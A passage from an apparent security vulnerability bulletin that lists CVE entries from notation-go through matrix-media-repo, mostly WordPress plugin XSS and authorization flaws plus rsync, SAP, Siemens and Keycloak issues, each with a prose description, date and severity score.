notion-go is a collection of libraries for supporting sign and verify OCI artifacts. Based on Notary Project specifications. This issue was identified during Quarkslab's audit of the timestamp feature. During the timestamp signature generation, the revocation status of the certificate(s) used to generate the timestamp signature was not verified. During timestamp signature generation, notation-go did not check the revocation status of the certificate chain used by the TSA. This oversight creates a vulnerability that could be exploited through a Man-in-The-Middle attack. An attacker could potentially use a compromised, intermediate, or revoked leaf certificate to generate a malicious countersignature, which would then be accepted and stored by `notation`. This could lead to denial of service scenarios, particularly in CI/CD environments during signature verification processes because timestamp signature would fail due to the presence of a revoked certificate(s) potentially disrupting operations. This issue has been addressed in release version 1.3.0-rc.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | 4 | CVE-2024-56138 |
| Nuanced Media--WP Meetup |
Missing Authorization vulnerability in Nuanced Media WP Meetup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Meetup: from n/a through 2.3.0. | 2025-01-16 | 5.4 | CVE-2025-23916 |
| Octopus Deploy--Kubernetes Worker or Kubernetes Agent |
In affected versions of the Octopus Kubernetes worker or agent, sensitive variables could be written to the Kubernetes script pod log in clear-text. This was identified in Version 2 however it was determined that this could also be achieved in Version 1 and the fix was applied to both versions accordingly. | 2025-01-16 | 6.5 | CVE-2024-12226 |
| Octrace Studio--WordPress HelpDesk & Support Ticket System Plugin Octrace Support |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Octrace Studio WordPress HelpDesk & Support Ticket System Plugin - Octrace Support allows Stored XSS.This issue affects WordPress HelpDesk & Support Ticket System Plugin - Octrace Support: from n/a through 1.2.7. | 2025-01-15 | 5.9 | CVE-2025-22762 |
| Olaf Lederer--Ajax Contact Form |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Olaf Lederer Ajax Contact Form allows Stored XSS.This issue affects Ajax Contact Form: from n/a through 1.2.5.1. | 2025-01-15 | 6.5 | CVE-2025-22761 |
| OMRON Corporation--Machine Automation Controller NJ-series |
Path Traversal Vulnerabilities (CWE-22) exist in NJ/NX-series Machine Automation Controllers. An attacker may use these vulnerabilities to perform unauthorized access and to execute unauthorized code remotely to the controller products. | 2025-01-14 | 6.6 | CVE-2024-12083 |
| OMRON Corporation--Programable Terminals NB-Designer |
We found a vulnerability Improper Restriction of XML External Entity Reference (CWE-611) in NB-series NX-Designer. Attackers may be able to abuse this vulnerability to disclose confidential data on a computer. | 2025-01-14 | 5.5 | CVE-2024-12298 |
| Oncle Tom--Mindmeister Shortcode |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Oncle Tom Mindmeister Shortcode allows DOM-Based XSS.This issue affects Mindmeister Shortcode: from n/a through 1.0. | 2025-01-16 | 6.5 | CVE-2025-23896 |
| Ossur--Mobile Logic Application |
Hard-coded credentials were included as part of the application binary. These credentials served as part of the application authentication flow and communication with the mobile application. An attacker could access unauthorized information. | 2025-01-17 | 4.3 | CVE-2024-45832 |
| Ossur--Mobile Logic Application |
A valid set of credentials in a .js file and a static token for communication were obtained from the decompiled IPA. An attacker could use the information to disrupt normal use of the application by changing the translation files and thus weaken the integrity of normal use. | 2025-01-17 | 4.4 | CVE-2024-53683 |
| Oulcan zgen--Gallery and Lightbox |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Oğulcan Özügenç Gallery and Lightbox allows Stored XSS.This issue affects Gallery and Lightbox: from n/a through 1.0.14. | 2025-01-15 | 6.5 | CVE-2025-22797 |
| Pegasystems--Pega Infinity |
Pega Platform versions 8.1 to Infinity 24.2.0 are affected by an Stored XSS issue with profile. | 2025-01-13 | 5.4 | CVE-2024-12211 |
| pflonk--Sidebar-Content from Shortcode |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pflonk Sidebar-Content from Shortcode allows DOM-Based XSS.This issue affects Sidebar-Content from Shortcode: from n/a through 2.0. | 2025-01-16 | 6.5 | CVE-2025-23642 |
| piotnetdotcom--Piotnet Addons For Elementor |
The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.4.32 via the 'pafe-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. | 2025-01-15 | 4.3 | CVE-2024-10775 |
| PMB Services--PMB platform |
Vulnerability in the PMB platform that allows an attacker to persist temporary files on the server, affecting versions 4.0.10 and above. This vulnerability exists in the file upload functionality on the '/pmb/authorities/import/iimport_authorities' endpoint. When a file is uploaded via this resource, the server will create a temporary file that will be deleted after the client sends a POST request to '/pmb/authorities/import/iimport_authorities'. This workflow is automated by the web client, however an attacker can trap and launch the second POST request to prevent the temporary file from being deleted. | 2025-01-16 | 6.5 | CVE-2025-0473 |
| Poll Maker Team--Poll Maker |
Missing Authorization vulnerability in Poll Maker Team Poll Maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Poll Maker: from n/a through 5.5.6. | 2025-01-15 | 6.5 | CVE-2024-56295 |
| Post SMTP--Post SMTP |
Missing Authorization vulnerability in Post SMTP Post SMTP allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post SMTP: from n/a through 2.9.11. | 2025-01-13 | 4.3 | CVE-2025-22800 |
| Pravin Durugkar--User Sync ActiveCampaign |
Missing Authorization vulnerability in Pravin Durugkar User Sync ActiveCampaign allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects User Sync ActiveCampaign: from n/a through 1.3.2. | 2025-01-16 | 5.4 | CVE-2025-23778 |
| Pressfore--Winning Portfolio |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pressfore Winning Portfolio allows Stored XSS.This issue affects Winning Portfolio: from n/a through 1.1. | 2025-01-16 | 6.5 | CVE-2025-23865 |
| PromoSimple--Giveaways and Contests by PromoSimple |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PromoSimple Giveaways and Contests by PromoSimple allows Stored XSS.This issue affects Giveaways and Contests by PromoSimple: from n/a through 1.24. | 2025-01-16 | 6.5 | CVE-2025-23934 |
| Radix--SmartRecovery |
Howyar UEFI Application "Reloader" (32-bit and 64-bit) is vulnerable to execution of unsigned software in a hardcoded path. | 2025-01-14 | 6.5 | CVE-2024-7344 |
| Rami Yushuvaev--Pastebin |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rami Yushuvaev Pastebin allows Stored XSS.This issue affects Pastebin: from n/a through 1.5. | 2025-01-16 | 6.5 | CVE-2025-23908 |
| RaminMT--Links/Problem Reporter |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RaminMT Links/Problem Reporter allows DOM-Based XSS.This issue affects Links/Problem Reporter: from n/a through 2.6.0. | 2025-01-16 | 6.5 | CVE-2025-23833 |
| rccoder--wp_amaps |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rccoder wp_amaps allows Stored XSS.This issue affects wp_amaps: from n/a through 1.7. | 2025-01-16 | 6.5 | CVE-2025-23794 |
| realwebcare--Awesome Responsive Photo Gallery Image & Video Lightbox Gallery |
The Image Gallery - Responsive Photo Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'awsmgallery' parameter in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-15 | 6.1 | CVE-2024-12403 |
| Red Hat--Red Hat build of Keycloak 26.0 |
A denial of service vulnerability was found in Keycloak that could allow an administrative user with the right to change realm settings to disrupt the service. This action is done by modifying any of the security headers and inserting newlines, which causes the Keycloak server to write to a request that has already been terminated, leading to the failure of said request. | 2025-01-14 | 6.5 | CVE-2024-11734 |
| Red Hat--Red Hat build of Keycloak 26.0 |
A vulnerability was found in Keycloak. Admin users may have to access sensitive server environment variables and system properties through user-configurable URLs. When configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing. | 2025-01-14 | 4.9 | CVE-2024-11736 |
| Red Hat--Red Hat Enterprise Linux 6 |
A flaw was found in rsync. It could allow a server to enumerate the contents of an arbitrary file from the client's machine. This issue occurs when files are being copied from a client to a server. During this process, the rsync server will send checksums of local data to the client to compare with in order to determine what data needs to be sent to the server. By sending specially constructed checksum values for arbitrary files, an attacker may be able to reconstruct the data of those files byte-by-byte based on the responses from the client. | 2025-01-14 | 6.1 | CVE-2024-12086 |
| Red Hat--Red Hat Enterprise Linux 6 |
A path traversal vulnerability exists in rsync. It stems from behavior enabled by the `--inc-recursive` option, a default-enabled option for many client options and can be enabled by the server even if not explicitly enabled by the client. When using the `--inc-recursive` option, a lack of proper symlink verification coupled with deduplication checks occurring on a per-file-list basis could allow a server to write files outside of the client's intended destination directory. A malicious server could write malicious files to arbitrary locations named after valid directories/paths on the client. | 2025-01-14 | 6.5 | CVE-2024-12087 |
| Red Hat--Red Hat Enterprise Linux 6 |
A flaw was found in rsync. When using the `--safe-links` option, rsync fails to properly verify if a symbolic link destination contains another symbolic link within it. This results in a path traversal vulnerability, which may lead to arbitrary file write outside the desired directory. | 2025-01-14 | 6.5 | CVE-2024-12088 |
| Red Hat--Red Hat Enterprise Linux 6 |
A flaw was found in rsync. This vulnerability arises from a race condition during rsync's handling of symbolic links. Rsync's default behavior when encountering symbolic links is to skip them. If an attacker replaced a regular file with a symbolic link at the right time, it was possible to bypass the default behavior and traverse symbolic links. Depending on the privileges of the rsync process, an attacker could leak sensitive information, potentially leading to privilege escalation. | 2025-01-14 | 5.6 | CVE-2024-12747 |
| Red Hat--Red Hat Enterprise Linux 9 |
A flaw was found in the FreeIPA API audit, where it sends the whole FreeIPA command line to journalctl. As a consequence, during the FreeIPA installation process, it inadvertently leaks the administrative user credentials, including the administrator password, to the journal database. In the worst-case scenario, where the journal log is centralized, users with access to it can have improper access to the FreeIPA administrator credentials. | 2025-01-15 | 5.5 | CVE-2024-11029 |
| Red Hat--Red Hat JBoss Data Grid 7 |
A flaw was found in the HAL Console in the Wildfly component, which does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output used as a web page that is served to other users. The attacker must be authenticated as a user that belongs to management groups "SuperUser", "Admin", or "Maintainer". | 2025-01-14 | 6.5 | CVE-2025-23366 |
| Rene Hermenau--QR Code Generator |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rene Hermenau QR Code Generator allows DOM-Based XSS.This issue affects QR Code Generator: from n/a through 1.2.6. | 2025-01-16 | 6.5 | CVE-2025-23831 |
| Revolutionart--Marmoset Viewer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Revolutionart Marmoset Viewer allows Stored XSS.This issue affects Marmoset Viewer: from n/a through 1.9.3. | 2025-01-16 | 6.5 | CVE-2025-23767 |
| Rob von Bothmer / SeoDev--S-DEV SEO |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rob von Bothmer / SeoDev S-DEV SEO allows Stored XSS.This issue affects S-DEV SEO: from n/a through 1.88. | 2025-01-15 | 6.5 | CVE-2025-22744 |
| robdavenport--WP Smart TV |
The WP Smart TV plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tv-video-player' shortcode in all versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-15 | 6.4 | CVE-2024-12818 |
| RocaPress--Horizontal Line Shortcode |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RocaPress Horizontal Line Shortcode allows Stored XSS.This issue affects Horizontal Line Shortcode: from n/a through 1.0. | 2025-01-16 | 6.5 | CVE-2025-23791 |
| Said Shiripour--EZPlayer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Said Shiripour EZPlayer allows Stored XSS.This issue affects EZPlayer: from n/a through 1.0.10. | 2025-01-16 | 6.5 | CVE-2025-23950 |
| Saiem Khan--Image Switcher |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saiem Khan Image Switcher allows Stored XSS.This issue affects Image Switcher: from n/a through 1.1. | 2025-01-16 | 6.5 | CVE-2025-23939 |
| Saiem Khan--Image Switcher |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saiem Khan Image Switcher allows Stored XSS.This issue affects Image Switcher: from n/a through 0.1.1. | 2025-01-16 | 6.5 | CVE-2025-23940 |
| Sanjaysolutions--Loginplus |
Missing Authorization vulnerability in Sanjaysolutions Loginplus allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Loginplus: from n/a through 1.2. | 2025-01-16 | 5.3 | CVE-2025-23514 |
| SAP_SE--SAP Business Workflow and SAP Flexible Workflow |
In SAP Business Workflow and SAP Flexible Workflow, an authenticated attacker can manipulate a parameter in an otherwise legitimate resource request to view sensitive information that should otherwise be restricted. The attacker does not have the ability to modify the information or to make the information unavailable. | 2025-01-14 | 6.5 | CVE-2025-0058 |
| SAP_SE--SAP BusinessObjects Business Intelligence Platform |
SAP BusinessObjects Business Intelligence Platform allows an authenticated user with restricted access to inject malicious JS code which can read sensitive information from the server and send it to the attacker. The attacker could further use this information to impersonate as a high privileged user causing high impact on confidentiality and integrity of the application. | 2025-01-14 | 6.5 | CVE-2025-0060 |
| SAP_SE--SAP GUI for Java |
SAP GUI for Java saves user input on the client PC to improve usability. An attacker with administrative privileges or access to the victim�s user directory on the Operating System level would be able to read this data. Depending on the user input provided in transactions, the disclosed data could range from non-critical data to highly sensitive data, causing high impact on confidentiality of the application. | 2025-01-14 | 6 | CVE-2025-0056 |
| SAP_SE--SAP GUI for Windows |
SAP GUI for Windows stores user input on the client PC to improve usability. Under very specific circumstances an attacker with administrative privileges or access to the victim�s user directory on the Operating System level would be able to read this data. Depending on the user input provided in transactions, the disclosed data could range from non-critical data to highly sensitive data, causing high impact on confidentiality of the application. | 2025-01-14 | 6 | CVE-2025-0055 |
| SAP_SE--SAP NetWeaver Application Server ABAP (applications based on SAP GUI for HTML) |
Applications based on SAP GUI for HTML in SAP NetWeaver Application Server ABAP store user input in the local browser storage to improve usability. An attacker with administrative privileges or access to the victim�s user directory on the Operating System level would be able to read this data. Depending on the user input provided in transactions, the disclosed data could range from non-critical data to highly sensitive data, causing high impact on confidentiality of the application. | 2025-01-14 | 6 | CVE-2025-0059 |
| SAP_SE--SAP NetWeaver Application Server ABAP |
An obsolete functionality in SAP NetWeaver Application Server ABAP did not perform necessary authorization checks. Because of this, an authenticated attacker could obtain information that would otherwise be restricted. It has no impact on integrity or availability on the application. | 2025-01-14 | 4.3 | CVE-2025-0068 |
| SAP_SE--SAP NetWeaver Application Server for ABAP and ABAP Platform |
SAP NetWeaver Application Server for ABAP and ABAP Platform allows an attacker to gain unauthorized access to system information. By using a specific URL parameter, an unauthenticated attacker could retrieve details such as system configuration. This has a limited impact on the confidentiality of the application and may be leveraged to facilitate further attacks or exploits. | 2025-01-14 | 5.3 | CVE-2025-0053 |
| SAP_SE--SAP NetWeaver Application Server Java |
Due to a missing authorization check on service endpoints in the SAP NetWeaver Application Server Java, an attacker with standard user role can create JCo connection entries, which are used for remote function calls from or to the application server. This could lead to low impact on confidentiality, integrity, and availability of the application. | 2025-01-14 | 6.3 | CVE-2025-0067 |
| SAP_SE--SAP NetWeaver AS JAVA (User Admin Application) |
SAP NetWeaver AS JAVA (User Admin Application) is vulnerable to stored cross site scripting vulnerability. An attacker posing as an admin can upload a photo with malicious JS content. When a victim visits the vulnerable component, the attacker can read and modify information within the scope of victim's web browser. | 2025-01-14 | 4.8 | CVE-2025-0057 |
| Schneider Electric--PowerLogic HDPM6000 |
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability exists that could allow an unauthorized attacker to modify configuration values outside of the normal range when the attacker sends specific Modbus write packets to the device which could result in invalid data or loss of web interface functionality. | 2025-01-17 | 6.5 | CVE-2024-10498 |
| Scott Allan Wallick--Blog Summary |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Allan Wallick Blog Summary allows Stored XSS.This issue affects Blog Summary: from n/a through 0.1.2 β. | 2025-01-16 | 6.5 | CVE-2025-23887 |
| Scott Reilly--Post-to-Post Links |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Reilly Post-to-Post Links allows Stored XSS.This issue affects Post-to-Post Links: from n/a through 4.2. | 2025-01-16 | 5.9 | CVE-2025-23878 |
| scottpaterson--Contact Form 7 Redirect & Thank You Page |
The Contact Form 7 Redirect & Thank You Page plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'post' parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-15 | 6.1 | CVE-2024-12423 |
| scribit--Proofreading |
The Proofreading plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'nonce' parameter in all versions up to, and including, 1.2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-17 | 6.1 | CVE-2024-12466 |
| scriptsbundle--DWT - Directory & Listing WordPress Theme |
The DWT - Directory & Listing WordPress Theme is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping on the 'sort_by' and 'token' parameters. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-16 | 6.1 | CVE-2025-0170 |
| SetMore Appointments--SetMore Theme Custom Post Types |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SetMore Appointments SetMore Theme - Custom Post Types allows Stored XSS.This issue affects SetMore Theme - Custom Post Types: from n/a through 1.1. | 2025-01-15 | 6.5 | CVE-2025-22748 |
| Shanghai Lingdang Information Technology--Lingdang CRM |
A vulnerability was found in Shanghai Lingdang Information Technology Lingdang CRM up to 8.6.0.0 and classified as critical. This issue affects some unknown processing of the file /crm/weixinmp/index.php?userid=123&module=Users&usid=1&action=UsersAjax&minipro_const_type=1. The manipulation of the argument searchcontent leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-14 | 6.3 | CVE-2025-0462 |
| Shanghai Lingdang Information Technology--Lingdang CRM |
A vulnerability was found in Shanghai Lingdang Information Technology Lingdang CRM up to 8.6.0.0. It has been classified as critical. Affected is an unknown function of the file /crm/weixinmp/index.php?userid=123&module=Users&usid=1&action=UsersAjax&minipro_const_type=1&related_module=Singin. The manipulation of the argument name leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-14 | 6.3 | CVE-2025-0463 |
| Shanghai Lingdang Information Technology--Lingdang CRM |
A vulnerability has been found in Shanghai Lingdang Information Technology Lingdang CRM up to 8.6.0.0 and classified as problematic. This vulnerability affects unknown code of the file /crm/weixinmp/index.php?userid=123&module=Users&usid=1&action=UsersAjax&minipro_const_type=1&related_module=Singin. The manipulation of the argument pathfile leads to path traversal. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-14 | 4.3 | CVE-2025-0461 |
| Siemens--Industrial Edge Management OS (IEM-OS) |
A vulnerability has been identified in Industrial Edge Management OS (IEM-OS) (All versions). Affected components are vulnerable to reflected cross-site scripting (XSS) attacks. This could allow an attacker to extract sensitive information by tricking users into accessing a malicious link. | 2025-01-14 | 4.7 | CVE-2024-45385 |
| Siemens--SIPROTEC 5 6MD84 (CP300) |
A vulnerability has been identified in SIPROTEC 5 6MD84 (CP300) (All versions < V9.80), SIPROTEC 5 6MD85 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 6MD86 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 6MD89 (CP300) (All versions >= V7.80), SIPROTEC 5 6MU85 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7KE85 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7SA82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SA82 (CP150) (All versions < V9.80), SIPROTEC 5 7SA86 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7SA87 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7SD82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SD82 (CP150) (All versions < V9.80), SIPROTEC 5 7SD86 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7SD87 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7SJ81 (CP100) (All versions >= V7.80), SIPROTEC 5 7SJ81 (CP150) (All versions < V9.80), SIPROTEC 5 7SJ82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SJ82 (CP150) (All versions < V9.80), SIPROTEC 5 7SJ85 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7SJ86 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7SK82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SK82 (CP150) (All versions < V9.80), SIPROTEC 5 7SK85 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7SL82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SL82 (CP150) (All versions < V9.80), SIPROTEC 5 7SL86 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7SL87 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7SS85 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7ST85 (CP300) (All versions), SIPROTEC 5 7ST86 (CP300) (All versions < V9.80), SIPROTEC 5 7SX82 (CP150) (All versions < V9.80), SIPROTEC 5 7SX85 (CP300) (All versions < V9.80), SIPROTEC 5 7SY82 (CP150) (All versions < V9.80), SIPROTEC 5 7UM85 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7UT82 (CP100) (All versions >= V7.80), SIPROTEC 5 7UT82 (CP150) (All versions < V9.80), SIPROTEC 5 7UT85 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7UT86 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7UT87 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7VE85 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7VK87 (CP300) (All versions >= V7.80 < V9.80), SIPROTEC 5 7VU85 (CP300) (All versions < V9.80), SIPROTEC 5 Compact 7SX800 (CP050) (All versions < V9.80). Affected devices do not properly limit the path accessible via their webserver. This could allow an authenticated remote attacker to read arbitrary files from the filesystem of affected devices. | 2025-01-14 | 6.5 | CVE-2024-53649 |
| silabs.com--EmberZNet |
A ZigBee coordinator, router, or end device may change their node ID when an unsolicited encrypted rejoin response is received, this change in node ID causes Denial of Service (DoS). To recover from this DoS, the network must be re-established | 2025-01-15 | 5.8 | CVE-2024-7322 |
| silabs.com--SiSDK |
A malformed packet can cause a buffer overflow in the APS layer of the Ember ZNet stack and lead to an assert | 2025-01-13 | 4.3 | CVE-2024-6352 |
| silverplugins217--Build Private Store For Woocommerce |
Cross-Site Request Forgery (CSRF) vulnerability in silverplugins217 Build Private Store For Woocommerce allows Cross Site Request Forgery.This issue affects Build Private Store For Woocommerce: from n/a through 1.0. | 2025-01-15 | 4.3 | CVE-2025-22731 |
| silverstripe--silverstripe-asset-admin |
silverstripe-asset-admin is a silverstripe assets gallery for asset management. When using the "insert media" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website. This issue has been addressed in silverstripe/framework version 5.3.8 and users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | 5.4 | CVE-2024-47605 |
| silverstripe--silverstripe-framework |
Silverstripe Framework is a PHP framework which powers the Silverstripe CMS. In some cases, form messages can contain HTML markup. This is an intentional feature, allowing links and other relevant HTML markup for the given message. Some form messages include content that the user can provide. There are scenarios in the CMS where that content doesn't get correctly sanitised prior to being included in the form message, resulting in an XSS vulnerability. This issue has been addressed in silverstripe/framework version 5.3.8 and users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | 5.4 | CVE-2024-53277 |
| sjhand--Webcamconsult |
The Webcamconsult plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-18 | 6.1 | CVE-2024-13432 |
| Smackcoders--SendGrid for WordPress |
Missing Authorization vulnerability in Smackcoders SendGrid for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SendGrid for WordPress: from n/a through 1.4. | 2025-01-16 | 4.3 | CVE-2025-23423 |
| smartagenda--Smart Agenda Prise de rendez-vous en ligne |
The Smart Agenda - Prise de rendez-vous en ligne plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.7. This is due to missing or incorrect nonce validation on the smartagenda_options_page_html() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-14 | 6.1 | CVE-2024-13348 |
| smub--Easy Digital Downloads eCommerce Payments and Subscriptions made easy |
The Easy Digital Downloads - eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title value in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-01-18 | 4.4 | CVE-2024-13517 |
| Soflyy--WP All Import Pro |
The Import any XML or CSV File to WordPress PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2025-01-19 | 5.5 | CVE-2024-8722 |
| Steven Soehl--WP-Revive Adserver |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Steven Soehl WP-Revive Adserver allows Stored XSS.This issue affects WP-Revive Adserver: from n/a through 2.2.1. | 2025-01-16 | 6.5 | CVE-2025-23802 |
| stylemix--Motors Car Dealer, Classifieds & Listing |
The The Motors - Car Dealer, Classifieds & Listing plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.4.43. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. | 2025-01-16 | 5.4 | CVE-2024-10970 |
| Sur.ly--Sur.ly |
Missing Authorization vulnerability in Sur.ly Sur.ly allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sur.ly: from n/a through 3.0.3. | 2025-01-16 | 4.3 | CVE-2025-23957 |
| Sven Hofmann & Michael Schoenrock--Mark Posts |
Missing Authorization vulnerability in Sven Hofmann & Michael Schoenrock Mark Posts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mark Posts: from n/a through 2.2.3. | 2025-01-16 | 5.4 | CVE-2025-23963 |
| swarminteractive--ViewMedica 9 |
The ViewMedica 9 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'viewmedica' shortcode in all versions up to, and including, 1.4.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-15 | 6.4 | CVE-2024-13394 |
| SzMake--Contact Form 7 Anti Spambot |
Missing Authorization vulnerability in SzMake Contact Form 7 Anti Spambot allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form 7 Anti Spambot: from n/a through 1.0.1. | 2025-01-16 | 5.3 | CVE-2025-23862 |
| t2bot--matrix-media-repo |
Matrix Media Repo (MMR) is a highly configurable multi-homeserver media repository for Matrix. If SVG or JPEGXL thumbnailers are enabled (they are disabled by default), a user may upload a file which claims to be either of these types and request a thumbnail to invoke a different decoder in ImageMagick. In some ImageMagick installations, this includes the capability to run Ghostscript to decode the image/file. If MP4 thumbnailers are enabled (also disabled by default), the same issue as above may occur with the ffmpeg installation instead. MMR uses a number of other decoders for all other file types when preparing thumbnails. Theoretical issues are possible with these decoders, however in testing they were not possible to exploit. This is fixed in MMR v1.3.8. MMR now inspects the mimetype of media prior to thumbnailing, and picks a thumbnailer based on those results instead of relying on user-supplied values. This may lead to fewer thumbnails when obscure file shapes are used. This also helps narrow scope of theoretical issues with all decoders MMR uses for thumbnails. Users are advised to upgrade. Users unable to upgrade may disable the SVG, JPEGXL, and MP4 thumbnail types in the MMR config which prevents the decoders from being invoked. Further disabling uncommon file types on the server is recommended to limit risk surface. Containers and other similar technologies may also be used to limit the impact of vulnerabilities in external decoders, like ImageMagick and ffmpeg. Some installations of ImageMagick may disable "unsafe" file types, like PDFs, already. This option can be replicated to other environments as needed. ffmpeg may be compiled with limited decoders/codecs. The Docker image for MMR disables PDFs and similar formats by default. | 2025-01-16 | 6.8 | CVE-2024-56515 |
| t2bot--matrix-media-repo |
